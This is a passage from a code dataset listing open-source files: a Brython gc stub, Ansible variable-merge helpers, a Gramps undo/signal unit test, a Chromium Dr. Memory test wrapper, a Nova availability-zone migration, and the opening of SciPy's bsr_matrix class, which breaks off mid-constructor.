repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
40223143/cda-w15 | static/Brython3.1.1-20150328-091302/Lib/gc.py | 743 | 3548 | """This module provides access to the garbage collector for reference cycles.
enable() -- Enable automatic garbage collection.
disable() -- Disable automatic garbage collection.
isenabled() -- Returns true if automatic collection is enabled.
collect() -- Do a full collection right now.
get_count() -- Return the current collection counts.
set_debug() -- Set debugging flags.
get_debug() -- Get debugging flags.
set_threshold() -- Set the collection thresholds.
get_threshold() -- Return the current the collection thresholds.
get_objects() -- Return a list of all objects tracked by the collector.
is_tracked() -- Returns true if a given object is tracked.
get_referrers() -- Return the list of objects that refer to an object.
get_referents() -- Return the list of objects that an object refers to.
"""
# Debugging flag constants, mirroring the values of CPython's gc module.
DEBUG_COLLECTABLE = 2
DEBUG_LEAK = 38  # == DEBUG_COLLECTABLE | DEBUG_UNCOLLECTABLE | DEBUG_SAVEALL
DEBUG_SAVEALL = 32
DEBUG_STATS = 1
DEBUG_UNCOLLECTABLE = 4

class __loader__:
    # Placeholder so this pure-Python stub resembles a built-in module.
    pass

# Callbacks invoked by the collector; always empty in this stub.
callbacks = []
def collect(*args, **kw):
    """collect([generation]) -> n

    Run a full collection, or only the given generation if an integer
    argument is supplied.  A ValueError is raised for an invalid
    generation number.  Returns the number of unreachable objects.
    """
    # Brython stub: memory is managed by the JavaScript runtime, so there
    # is nothing to collect here.
    return None
def disable(*args, **kw):
    """disable() -> None

    Turn off automatic garbage collection.
    """
    return None  # no-op under Brython
def enable(*args, **kw):
    """enable() -> None

    Turn on automatic garbage collection.
    """
    return None  # no-op under Brython
# Objects the collector found unreachable but could not free;
# always empty in this stub.
garbage = []
def get_count(*args, **kw):
    """get_count() -> (count0, count1, count2)

    Report the current collection counts.
    """
    return None  # stub: no generation counters exist under Brython
def get_debug(*args, **kw):
    """get_debug() -> flags

    Report the garbage collection debugging flags.
    """
    return None  # stub: no debug state is kept
def get_objects(*args, **kw):
    """get_objects() -> [...]

    Report the objects tracked by the collector (excluding the
    returned list itself).
    """
    return None  # stub: object tracking is not available
def get_referents(*args, **kw):
    """get_referents(*objs) -> list

    Report the objects directly referred to by objs.
    """
    return None  # stub: reference graph is not exposed by Brython
def get_referrers(*args, **kw):
    """get_referrers(*objs) -> list

    Report the objects that directly refer to any of objs.
    """
    return None  # stub: reference graph is not exposed by Brython
def get_threshold(*args, **kw):
    """get_threshold() -> (threshold0, threshold1, threshold2)

    Report the current collection thresholds.
    """
    return None  # stub: no thresholds exist under Brython
def is_tracked(*args, **kw):
    """is_tracked(obj) -> bool

    True if the object is tracked by the garbage collector; simple
    atomic objects return false.
    """
    return None  # stub: tracking information is unavailable
def isenabled(*args, **kw):
    """isenabled() -> status

    True if automatic garbage collection is enabled.
    """
    return None  # stub: no collector state is kept
def set_debug(*args, **kw):
    """set_debug(flags) -> None

    Set the garbage collection debugging flags; output would go to
    sys.stderr.  ``flags`` is an integer combining:

    DEBUG_STATS         - print statistics during collection
    DEBUG_COLLECTABLE   - print collectable objects found
    DEBUG_UNCOLLECTABLE - print unreachable but uncollectable objects
    DEBUG_SAVEALL       - save objects to gc.garbage instead of freeing
    DEBUG_LEAK          - debug leaking programs (everything but STATS)
    """
    return None  # no-op under Brython
def set_threshold(*args, **kw):
    """set_threshold(threshold0, [threshold1, threshold2]) -> None

    Set the collection thresholds; a threshold0 of zero disables
    collection.
    """
    return None  # no-op under Brython
| agpl-3.0 |
chrrrles/ansible | lib/ansible/utils/vars.py | 25 | 4411 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import ast
from collections import MutableMapping
from six import iteritems, string_types
from ansible import constants as C
from ansible.errors import AnsibleError
from ansible.parsing.splitter import parse_kv
from ansible.utils.unicode import to_unicode
def _validate_mutable_mappings(a, b):
    """
    Internal convenience function to ensure arguments are MutableMappings

    This checks that all arguments are MutableMappings or raises an error
    :raises AnsibleError: if one of the arguments is not a MutableMapping
    """
    # If this becomes generally needed, change the signature to operate on
    # a variable number of arguments instead.
    for candidate in (a, b):
        if not isinstance(candidate, MutableMapping):
            raise AnsibleError("failed to combine variables, expected dicts but"
                               " got a '{0}' and a '{1}'".format(
                                   a.__class__.__name__, b.__class__.__name__))
def combine_vars(a, b):
    """
    Return a copy of dictionaries of variables based on configured hash behavior
    """
    if C.DEFAULT_HASH_BEHAVIOUR == "merge":
        return merge_hash(a, b)

    # HASH_BEHAVIOUR == 'replace': b's keys simply overwrite a's
    _validate_mutable_mappings(a, b)
    combined = a.copy()
    combined.update(b)
    return combined
def merge_hash(a, b):
    """
    Recursively merges hash b into a so that keys from b take precedence
    over keys from a
    """
    _validate_mutable_mappings(a, b)
    merged = a.copy()
    # walk b's keys; nested mappings are merged, everything else is replaced
    for key, b_value in iteritems(b):
        if key in merged and isinstance(merged[key], MutableMapping):
            # both sides hold a mapping here -- merge them recursively
            merged[key] = merge_hash(merged[key], b_value)
        else:
            # key is new, or the existing value is not a mapping: b wins
            merged[key] = b_value
    return merged
def load_extra_vars(loader, options):
    """Accumulate every -e/--extra-vars option into one combined dict.

    Each option may be '@<file>' (YAML/JSON file), inline YAML/JSON
    (starts with '[' or '{'), or key=value pairs.
    """
    extra_vars = {}
    for raw_opt in options.extra_vars:
        raw_opt = to_unicode(raw_opt, errors='strict')
        if raw_opt.startswith(u"@"):
            # Argument is a YAML file (JSON is a subset of YAML)
            data = loader.load_from_file(raw_opt[1:])
        elif raw_opt and raw_opt[0] in u'[{':
            # Arguments as YAML
            data = loader.load(raw_opt)
        else:
            # Arguments as Key-value
            data = parse_kv(raw_opt)
        extra_vars = combine_vars(extra_vars, data)
    return extra_vars
def isidentifier(ident):
    """
    Determines, if string is valid Python identifier using the ast module.

    Originally posted at: http://stackoverflow.com/a/29586366
    """
    if not isinstance(ident, string_types):
        return False

    try:
        root = ast.parse(ident)
    except SyntaxError:
        return False

    # A bare identifier parses to a Module holding exactly one
    # expression statement whose value is a Name matching the input.
    if not isinstance(root, ast.Module) or len(root.body) != 1:
        return False
    stmt = root.body[0]
    return (isinstance(stmt, ast.Expr)
            and isinstance(stmt.value, ast.Name)
            and stmt.value.id == ident)
def json_variable_cleaner(obj):
    '''
    Used as the default= parameter to json.dumps(), this method helps
    clear out UnsafeProxy variables so they can be properly JSON encoded
    '''
    # Imported here (not at module level) to avoid a circular import.
    from ansible.vars.unsafe_proxy import UnsafeProxy
    return obj._obj if isinstance(obj, UnsafeProxy) else obj
| gpl-3.0 |
sam-m888/gramps | gramps/plugins/test/db_undo_and_signals_test.py | 1 | 17360 | #! /usr/bin/env python3
"""
Gramps - a GTK+/GNOME based genealogy program
Copyright (c) 2016 Gramps Development Team
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""
import unittest
#-------------------------------------------------------------------------
#
# Gramps modules
#
#-------------------------------------------------------------------------
from gramps.gen.utils.id import set_det_id
from gramps.gen.db import DbTxn
from gramps.gen.db.utils import make_database
from gramps.gen.dbstate import DbState
from gramps.cli.clidbman import CLIDbManager
from gramps.gen.lib import (Person, Family, Note, Surname)
from gramps.gen.merge import MergeFamilyQuery
from gramps.gen.utils.callman import CallbackManager
class DbTestClassBase(object):
    """Exercise db undo/redo together with the signal/callback machinery.

    Concrete TestCase subclasses (one per db backend) are generated at
    module level by mixing this class with unittest.TestCase; ``param``
    is the backend id set on each generated subclass.
    """
    # Inherit from `object` so unittest doesn't think these are tests which
    # should be run

    @classmethod
    def setUpClass(cls):
        # print("doing setup with", cls.param)
        set_det_id(True)  # handles must be deterministic for this test
        cls.dbstate = DbState()
        cls.dbman = CLIDbManager(cls.dbstate)
        dirpath, _name = cls.dbman.create_new_db_cli("Test: %s" % cls.param,
                                                     dbid=cls.param)
        cls.db = make_database(cls.param)
        cls.db.load(dirpath, None)

    @classmethod
    def tearDownClass(cls):
        # print("tear down", cls.param)
        cls.db.close()
        cls.dbman.remove_database("Test: %s" % cls.param)

    def __add_person(self, gender, first_name, surname, trans):
        # Helper: create and add a Person with the given name/gender.
        person = Person()
        person.gender = gender
        _name = person.primary_name
        _name.first_name = first_name
        surname1 = Surname()
        surname1.surname = surname
        _name.set_surname_list([surname1])
        self.db.add_person(person, trans)
        return person

    def __add_note(self, text, trans):
        # Helper: create and add a Note with the given text.
        note = Note(text=text)
        self.db.add_note(note, trans)
        return note

    def __add_family(self, father, mother, trans):
        # Helper: create a Family linking father/mother and commit both
        # parents so their family lists are updated.
        family = Family()
        family.set_father_handle(father.handle)
        family.set_mother_handle(mother.handle)
        fam_handle = self.db.add_family(family, trans)
        father.add_family_handle(fam_handle)
        mother.add_family_handle(fam_handle)
        self.db.commit_person(father, trans)
        self.db.commit_person(mother, trans)
        return family

    def __setup_callbacks(self):
        # Record every add/update/delete signal for families, persons
        # and notes into self.sigs via _log_sig.
        self.db.connect("family-add", self._family_add)
        self.db.connect("family-update", self._family_update)
        self.db.connect("family-delete", self._family_delete)
        self.db.connect("person-add", self._person_add)
        self.db.connect("person-update", self._person_update)
        self.db.connect("person-delete", self._person_delete)
        self.db.connect("note-add", self._note_add)
        self.db.connect("note-update", self._note_update)
        self.db.connect("note-delete", self._note_delete)
        # we will also test the CallbackManager by watching a single person
        self.cm_sigs = []
        self.callman = CallbackManager(self.db)
        self.callman.register_callbacks({'person-delete': self._cm_pers_delete,
                                         'person-update': self._cm_pers_update,
                                         'person-add': self._cm_pers_add})
        self.callman.connect_all(keys=['person'])
        self.callman.register_handles({'person': ['0000000300000003',
                                                  '0000000700000007']})

    # Plain-signal handlers: each just logs (signal-name, handle-list).
    def _family_add(self, *args):
        self._log_sig("family-add", args)

    def _family_update(self, *args):
        self._log_sig("family-update", args)

    def _family_delete(self, *args):
        self._log_sig("family-delete", args)

    def _person_add(self, *args):
        self._log_sig("person-add", args)

    def _person_update(self, *args):
        self._log_sig("person-update", args)

    def _person_delete(self, *args):
        self._log_sig("person-delete", args)

    def _note_add(self, *args):
        self._log_sig("note-add", args)

    def _note_update(self, *args):
        self._log_sig("note-update", args)

    def _note_delete(self, *args):
        self._log_sig("note-delete", args)

    def _log_sig(self, sig, args):
        print("('%s', %s)," % (sig, args))
        self.sigs.append((sig, args[0]))

    # CallbackManager handlers: log into the separate cm_sigs list.
    def _cm_pers_add(self, *args):
        self.cm_sigs.append(("person-add", args[0]))

    def _cm_pers_update(self, *args):
        self.cm_sigs.append(("person-update", args[0]))

    def _cm_pers_delete(self, *args):
        self.cm_sigs.append(("person-delete", args[0]))

    def test_one(self):
        """Drive add/merge/undo/redo cycles and verify emitted signals."""
        self.__setup_callbacks()
        self.sigs = []
        with DbTxn('Add test objects', self.db) as trans:
            father1 = self.__add_person(Person.MALE, 'John', 'Allen', trans)
            mother1 = self.__add_person(Person.FEMALE, 'Mary', 'Allen', trans)
            father2 = self.__add_person(Person.MALE, 'John', 'Baker', trans)
            mother2 = self.__add_person(Person.FEMALE, 'Mary', 'Baker', trans)
            family1 = self.__add_family(father1, mother1, trans)
            family2 = self.__add_family(father2, mother2, trans)
            self.callman.register_obj(father2, directonly=True)
            self.callman.register_obj(father2, directonly=False)
        sigs = [
            ('person-add', ['0000000100000001', '0000000200000002',
                            '0000000300000003', '0000000400000004']),
            ('family-add', ['0000000500000005', '0000000600000006']),
            ('person-update', ['0000000100000001', '0000000200000002',
                               '0000000300000003', '0000000400000004'])]
        self.assertEqual(sigs, self.sigs, msg="make families")
        # save state for later undo/redo check
        step1 = (family1, father1, mother1, family2, father2, mother2)
        fam_cnt = self.db.get_number_of_families()
        pers_cnt = self.db.get_number_of_people()
        self.assertEqual(fam_cnt, 2, msg="make families check")
        self.assertEqual(pers_cnt, 4, msg="make families persons check")
        # lets do a family merge, this will not only combine the families, but
        # also combine the the fathers and mothers as well
        self.sigs = []
        query = MergeFamilyQuery(self.db, family1, family2,
                                 father1.handle, mother1.handle)
        query.execute()
        sigs = [
            ('person-delete', ['0000000300000003', '0000000400000004']),
            ('family-delete', ['0000000600000006']),
            ('person-update', ['0000000100000001', '0000000200000002',
                               '0000000100000001', '0000000200000002']),
            ('family-update', ['0000000500000005', '0000000500000005'])]
        self.assertEqual(sigs, self.sigs, msg="merge families")
        fam_cnt = self.db.get_number_of_families()
        pers_cnt = self.db.get_number_of_people()
        self.assertEqual(fam_cnt, 1, msg="merge families check")
        self.assertEqual(pers_cnt, 2, msg="merge families persons check")
        # save new family'people for later redo check
        family1 = self.db.get_family_from_handle(family1.handle)
        father1 = self.db.get_person_from_handle(father1.handle)
        mother1 = self.db.get_person_from_handle(mother1.handle)
        step2 = (family1, father1, mother1)
        # we check that update and add signals are not emitted if the same
        # object is deleted in the same transation
        self.sigs = []
        with DbTxn('Note add/update/delete', self.db) as trans:
            note = self.__add_note("some text", trans)
            note.set("some other text")
            self.db.commit_note(note, trans)
            self.db.remove_note(note.handle, trans)
        sigs = [
            ('note-delete', ['0000000700000007'])]
        self.assertEqual(sigs, self.sigs, msg="note signals check")
        note_cnt = self.db.get_number_of_notes()
        self.assertEqual(note_cnt, 0, msg="note check")
        # Test some undos, start with the note undo
        self.sigs = []
        self.db.undo()
        sigs = [('note-delete', ['0000000700000007'])]
        self.assertEqual(sigs, self.sigs, msg="undo note signals check")
        # Test merge undo
        self.sigs = []
        self.db.undo()
        sigs = [
            ('person-add', ['0000000400000004', '0000000300000003']),
            ('family-add', ['0000000600000006']),
            ('person-update', ['0000000200000002', '0000000100000001',
                               '0000000200000002', '0000000100000001']),
            ('family-update', ['0000000500000005', '0000000600000006',
                               '0000000600000006', '0000000500000005'])]
        self.assertEqual(sigs, self.sigs, msg="undo merge signals check")
        fam_cnt = self.db.get_number_of_families()
        pers_cnt = self.db.get_number_of_people()
        self.assertEqual(fam_cnt, 2, msg="undo merge families check")
        self.assertEqual(pers_cnt, 4, msg="undo merge families persons check")
        #step1 = (family1, father1, mother1, family2, father2, mother2)
        obj_s = self.db.get_family_from_handle(family1.handle).serialize()
        self.assertEqual(obj_s, step1[0].serialize(),
                         msg="undo merge families fam1 check")
        obj_s = self.db.get_person_from_handle(father1.handle).serialize()
        self.assertEqual(obj_s, step1[1].serialize(),
                         msg="undo merge families father1 check")
        obj_s = self.db.get_person_from_handle(mother1.handle).serialize()
        self.assertEqual(obj_s, step1[2].serialize(),
                         msg="undo merge families mother1 check")
        obj_s = self.db.get_family_from_handle(family2.handle).serialize()
        self.assertEqual(obj_s, step1[3].serialize(),
                         msg="undo merge families fam2 check")
        obj_s = self.db.get_person_from_handle(father2.handle).serialize()
        self.assertEqual(obj_s, step1[4].serialize(),
                         msg="undo merge families father2 check")
        obj_s = self.db.get_person_from_handle(mother2.handle).serialize()
        self.assertEqual(obj_s, step1[5].serialize(),
                         msg="undo merge families mother2 check")
        # Test family build undo
        self.sigs = []
        self.db.undo()
        sigs = [
            ('person-delete', ['0000000400000004', '0000000300000003',
                               '0000000200000002', '0000000100000001']),
            ('family-delete', ['0000000600000006', '0000000500000005'])]
        self.assertEqual(sigs, self.sigs, msg="undo family build signals check")
        fam_cnt = self.db.get_number_of_families()
        pers_cnt = self.db.get_number_of_people()
        self.assertEqual(fam_cnt, 0, msg="undo make families check")
        self.assertEqual(pers_cnt, 0, msg="undo make families persons check")
        # Test family build redo
        self.sigs = []
        self.db.redo()
        sigs = [
            ('person-add', ['0000000100000001', '0000000200000002',
                            '0000000300000003', '0000000400000004']),
            ('family-add', ['0000000500000005', '0000000600000006']),
            ('person-update', ['0000000100000001', '0000000200000002',
                               '0000000300000003', '0000000400000004'])]
        self.assertEqual(sigs, self.sigs, msg="redo family build signals check")
        fam_cnt = self.db.get_number_of_families()
        pers_cnt = self.db.get_number_of_people()
        self.assertEqual(fam_cnt, 2, msg="redo make families check")
        self.assertEqual(pers_cnt, 4, msg="redo make families persons check")
        #step1 = (family1, father1, mother1, family2, father2, mother2)
        obj_s = self.db.get_family_from_handle(family1.handle).serialize()
        self.assertEqual(obj_s, step1[0].serialize(),
                         msg="redo merge families fam1 check")
        obj_s = self.db.get_person_from_handle(father1.handle).serialize()
        self.assertEqual(obj_s, step1[1].serialize(),
                         msg="redo merge families father1 check")
        obj_s = self.db.get_person_from_handle(mother1.handle).serialize()
        self.assertEqual(obj_s, step1[2].serialize(),
                         msg="redo merge families mother1 check")
        obj_s = self.db.get_family_from_handle(family2.handle).serialize()
        self.assertEqual(obj_s, step1[3].serialize(),
                         msg="redo merge families fam2 check")
        obj_s = self.db.get_person_from_handle(father2.handle).serialize()
        self.assertEqual(obj_s, step1[4].serialize(),
                         msg="redo merge families father2 check")
        obj_s = self.db.get_person_from_handle(mother2.handle).serialize()
        self.assertEqual(obj_s, step1[5].serialize(),
                         msg="redo merge families mother2 check")
        # Test family merge redo
        self.sigs = []
        self.db.redo()
        sigs = [
            ('person-delete', ['0000000300000003', '0000000400000004']),
            ('family-delete', ['0000000600000006']),
            ('person-update', ['0000000100000001', '0000000200000002',
                               '0000000100000001', '0000000200000002']),
            ('family-update', ['0000000500000005', '0000000500000005'])]
        self.assertEqual(sigs, self.sigs, msg="merge families")
        fam_cnt = self.db.get_number_of_families()
        pers_cnt = self.db.get_number_of_people()
        self.assertEqual(fam_cnt, 1, msg="merge families check")
        self.assertEqual(pers_cnt, 2, msg="merge families persons check")
        #step2 = (family1, father1, mother1)
        obj_s = self.db.get_family_from_handle(family1.handle).serialize()
        self.assertEqual(obj_s, step2[0].serialize(),
                         msg="undo merge families fam1 check")
        obj_s = self.db.get_person_from_handle(father1.handle).serialize()
        self.assertEqual(obj_s, step2[1].serialize(),
                         msg="undo merge families father1 check")
        obj_s = self.db.get_person_from_handle(mother1.handle).serialize()
        self.assertEqual(obj_s, step2[2].serialize(),
                         msg="undo merge families mother1 check")
        # Test note redo
        self.sigs = []
        self.db.redo()
        sigs = [('note-delete', ['0000000700000007'])]
        self.assertEqual(sigs, self.sigs, msg="undo note signals check")
        # now lets see if the callback manager is doing its job
        # print(self.cm_sigs)
        sigs = [
            ('person-add', ['0000000300000003']),
            ('person-update', ['0000000300000003']),
            ('person-delete', ['0000000300000003']),
            ('person-add', ['0000000300000003']),
            ('person-delete', ['0000000300000003']),
            ('person-add', ['0000000300000003']),
            ('person-update', ['0000000300000003']),
            ('person-delete', ['0000000300000003'])]
        self.assertEqual(sigs, self.cm_sigs,
                         msg="callback manager signals check")
        self.callman.unregister_handles({'person': ['0000000300000003']})
        # we have to look deep into cm to see if handles are really deleted
        cm_persons = self.callman._CallbackManager__handles['person']
        self.assertEqual(cm_persons, ['0000000700000007'],
                         msg="Callback Manager unregister check")
        self.callman.unregister_all()
        # we have to look deep into cm to see if handles are really deleted
        cm_persons = self.callman._CallbackManager__handles['person']
        self.assertEqual(cm_persons, [],
                         msg="Callback Manager unregister check")
        # we have to look deep into cm to see if callbacks are really deleted
        cm_padd_key = self.callman._CallbackManager__callbacks['person-add'][1]
        self.assertEqual(cm_padd_key, 10,
                         msg="Callback Manager cb check")
        self.callman.disconnect_all()
        # we have to look deep into cm to see if callbacks are really deleted
        cm_padd_key = self.callman._CallbackManager__callbacks['person-add'][1]
        self.assertEqual(cm_padd_key, None,
                         msg="Callback Manager disconnect cb check")
# Generate one concrete TestCase subclass per database backend, so the
# whole suite above runs once against each backend.
params = [('BsdDb', 'bsddb'), ('SQLite', 'sqlite')]
for backend_name, backend_id in params:
    cls_name = "TestMyTestClass_%s" % (backend_name, )
    test_cls = type(cls_name, (DbTestClassBase, unittest.TestCase),
                    {"param": backend_id, })
    globals()[cls_name] = test_cls
# Allow running this test module directly from the command line.
if __name__ == "__main__":
    unittest.main()
| gpl-2.0 |
bright-sparks/chromium-spacewalk | tools/valgrind/browser_wrapper_win.py | 44 | 1638 | # Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# NOTE(review): this is a Python 2 script (it uses the `print >>f`
# statement); do not run it under Python 3 without porting.
import glob
import os
import re
import sys
import subprocess

# TODO(timurrrr): we may use it on POSIX too to avoid code duplication once we
# support layout_tests, remove Dr. Memory specific code and verify it works
# on a "clean" Mac.

# Extract the gtest test-case name from a --gtest_filter=... argument,
# if one was passed; the assert guards against it appearing twice.
testcase_name = None
for arg in sys.argv:
  m = re.match("\-\-gtest_filter=(.*)", arg)
  if m:
    assert testcase_name is None
    testcase_name = m.groups()[0]

# arg #0 is the path to this python script
cmd_to_run = sys.argv[1:]

# TODO(timurrrr): this is Dr. Memory-specific
# Usually, we pass "-logdir" "foo\bar\spam path" args to Dr. Memory.
# To group reports per UI test, we want to put the reports for each test into a
# separate directory. This code can be simplified when we have
# http://code.google.com/p/drmemory/issues/detail?id=684 fixed.
logdir_idx = cmd_to_run.index("-logdir")
old_logdir = cmd_to_run[logdir_idx + 1]

wrapper_pid = str(os.getpid())

# On Windows, there is a chance of PID collision. We avoid it by appending the
# number of entries in the logdir at the end of wrapper_pid.
# This number is monotonic and we can't have two simultaneously running wrappers
# with the same PID.
wrapper_pid += "_%d" % len(glob.glob(old_logdir + "\\*"))

# Redirect this test's logs into its own subdirectory of the old logdir.
cmd_to_run[logdir_idx + 1] += "\\testcase.%s.logs" % wrapper_pid
os.makedirs(cmd_to_run[logdir_idx + 1])

# Record the test-case name next to the logs so reports can be attributed.
if testcase_name:
  f = open(old_logdir + "\\testcase.%s.name" % wrapper_pid, "w")
  print >>f, testcase_name
  f.close()

# Propagate the wrapped command's exit status as our own.
exit(subprocess.call(cmd_to_run))
| bsd-3-clause |
dstroppa/openstack-smartos-nova-grizzly | nova/db/sqlalchemy/migrate_repo/versions/147_no_service_zones.py | 7 | 3579 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import String, Column, MetaData, Table, select
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
""" Remove availability_zone column from services model and replace with
aggregate based zone."""
def upgrade(migrate_engine):
    """Move per-service availability_zone values into AZ aggregates.

    For each nova-compute service row: find (or create) the aggregate
    whose 'availability_zone' metadata matches the service's zone, add
    the service's host to that aggregate, then drop the old
    services.availability_zone column.
    """
    meta = MetaData()
    meta.bind = migrate_engine
    services = Table('services', meta, autoload=True)
    aggregates = Table('aggregates', meta, autoload=True)
    aggregate_metadata = Table('aggregate_metadata', meta, autoload=True)
    # migrate data
    record_list = list(services.select().execute())
    for rec in record_list:
        # Only need to migrate nova-compute availability_zones
        if rec['binary'] != 'nova-compute':
            continue
        # if zone doesn't exist create
        result = aggregate_metadata.select().where(
            aggregate_metadata.c.key == 'availability_zone').where(
            aggregate_metadata.c.value == rec['availability_zone']).execute()
        result = [r for r in result]
        if len(result) > 0:
            agg_id = result[0].aggregate_id
        else:
            # no aggregate yet for this zone: create the aggregate row,
            # then its 'availability_zone' metadata row (timestamps and
            # deleted flags copied from the service record)
            agg = aggregates.insert()
            result = agg.execute({'name': rec['availability_zone']})
            agg_id = result.inserted_primary_key[0]
            row = aggregate_metadata.insert()
            row.execute({'created_at': rec['created_at'],
                         'updated_at': rec['updated_at'],
                         'deleted_at': rec['deleted_at'],
                         'deleted': rec['deleted'],
                         'key': 'availability_zone',
                         'value': rec['availability_zone'],
                         'aggregate_id': agg_id,
                         })
        # add host to zone
        agg_hosts = Table('aggregate_hosts', meta, autoload=True)
        num_hosts = agg_hosts.count().where(
            agg_hosts.c.host == rec['host']).where(
            agg_hosts.c.aggregate_id == agg_id).execute().scalar()
        if num_hosts == 0:
            agg_hosts.insert().execute({'host': rec['host'],
                                        'aggregate_id': agg_id})
    services.drop_column('availability_zone')
def downgrade(migrate_engine):
    """Re-add services.availability_zone and fill it from AZ aggregates.

    The new column defaults to 'nova'; nova-compute rows get the zone
    value found via their host's aggregate membership.
    """
    meta = MetaData()
    meta.bind = migrate_engine
    services = Table('services', meta, autoload=True)
    aggregate_metadata = Table('aggregate_metadata', meta, autoload=True)
    agg_hosts = Table('aggregate_hosts', meta, autoload=True)
    availability_zone = Column('availability_zone', String(255),
                               default='nova')
    services.create_column(availability_zone)
    # migrate data: correlated subquery joining host -> aggregate -> zone
    services.update().values(availability_zone=select(
        [aggregate_metadata.c.value]).
        where(agg_hosts.c.aggregate_id == aggregate_metadata.c.aggregate_id).
        where(aggregate_metadata.c.key == 'availability_zone').
        where(agg_hosts.c.host == services.c.host).
        where(services.c.binary == 'nova-compute')).execute()
| apache-2.0 |
mdhaber/scipy | scipy/sparse/bsr.py | 12 | 25610 | """Compressed Block Sparse Row matrix format"""
__docformat__ = "restructuredtext en"
__all__ = ['bsr_matrix', 'isspmatrix_bsr']
from warnings import warn
import numpy as np
from .data import _data_matrix, _minmax_mixin
from .compressed import _cs_matrix
from .base import isspmatrix, _formats, spmatrix
from .sputils import (isshape, getdtype, getdata, to_native, upcast,
get_index_dtype, check_shape)
from . import _sparsetools
from ._sparsetools import (bsr_matvec, bsr_matvecs, csr_matmat_maxnnz,
bsr_matmat, bsr_transpose, bsr_sort_indices,
bsr_tocsr)
class bsr_matrix(_cs_matrix, _minmax_mixin):
"""Block Sparse Row matrix
This can be instantiated in several ways:
bsr_matrix(D, [blocksize=(R,C)])
where D is a dense matrix or 2-D ndarray.
bsr_matrix(S, [blocksize=(R,C)])
with another sparse matrix S (equivalent to S.tobsr())
bsr_matrix((M, N), [blocksize=(R,C), dtype])
to construct an empty matrix with shape (M, N)
dtype is optional, defaulting to dtype='d'.
bsr_matrix((data, ij), [blocksize=(R,C), shape=(M, N)])
where ``data`` and ``ij`` satisfy ``a[ij[0, k], ij[1, k]] = data[k]``
bsr_matrix((data, indices, indptr), [shape=(M, N)])
is the standard BSR representation where the block column
indices for row i are stored in ``indices[indptr[i]:indptr[i+1]]``
and their corresponding block values are stored in
``data[ indptr[i]: indptr[i+1] ]``. If the shape parameter is not
supplied, the matrix dimensions are inferred from the index arrays.
Attributes
----------
dtype : dtype
Data type of the matrix
shape : 2-tuple
Shape of the matrix
ndim : int
Number of dimensions (this is always 2)
nnz
Number of stored values, including explicit zeros
data
Data array of the matrix
indices
BSR format index array
indptr
BSR format index pointer array
blocksize
Block size of the matrix
has_sorted_indices
Whether indices are sorted
Notes
-----
Sparse matrices can be used in arithmetic operations: they support
addition, subtraction, multiplication, division, and matrix power.
**Summary of BSR format**
The Block Compressed Row (BSR) format is very similar to the Compressed
Sparse Row (CSR) format. BSR is appropriate for sparse matrices with dense
sub matrices like the last example below. Block matrices often arise in
vector-valued finite element discretizations. In such cases, BSR is
considerably more efficient than CSR and CSC for many sparse arithmetic
operations.
**Blocksize**
The blocksize (R,C) must evenly divide the shape of the matrix (M,N).
That is, R and C must satisfy the relationship ``M % R = 0`` and
``N % C = 0``.
If no blocksize is specified, a simple heuristic is applied to determine
an appropriate blocksize.
Examples
--------
>>> from scipy.sparse import bsr_matrix
>>> bsr_matrix((3, 4), dtype=np.int8).toarray()
array([[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=int8)
>>> row = np.array([0, 0, 1, 2, 2, 2])
>>> col = np.array([0, 2, 2, 0, 1, 2])
>>> data = np.array([1, 2, 3 ,4, 5, 6])
>>> bsr_matrix((data, (row, col)), shape=(3, 3)).toarray()
array([[1, 0, 2],
[0, 0, 3],
[4, 5, 6]])
>>> indptr = np.array([0, 2, 3, 6])
>>> indices = np.array([0, 2, 2, 0, 1, 2])
>>> data = np.array([1, 2, 3, 4, 5, 6]).repeat(4).reshape(6, 2, 2)
>>> bsr_matrix((data,indices,indptr), shape=(6, 6)).toarray()
array([[1, 1, 0, 0, 2, 2],
[1, 1, 0, 0, 2, 2],
[0, 0, 0, 0, 3, 3],
[0, 0, 0, 0, 3, 3],
[4, 4, 5, 5, 6, 6],
[4, 4, 5, 5, 6, 6]])
"""
format = 'bsr'
    def __init__(self, arg1, shape=None, dtype=None, copy=False, blocksize=None):
        """Construct a BSR matrix from a sparse matrix, a shape tuple,
        a (data, ij) / (data, indices, indptr) tuple, or a dense array."""
        _data_matrix.__init__(self)

        if isspmatrix(arg1):
            # another sparse matrix: copy or convert to BSR
            if isspmatrix_bsr(arg1) and copy:
                arg1 = arg1.copy()
            else:
                arg1 = arg1.tobsr(blocksize=blocksize)
            self._set_self(arg1)

        elif isinstance(arg1,tuple):
            if isshape(arg1):
                # it's a tuple of matrix dimensions (M,N)
                self._shape = check_shape(arg1)
                M,N = self.shape
                # process blocksize
                if blocksize is None:
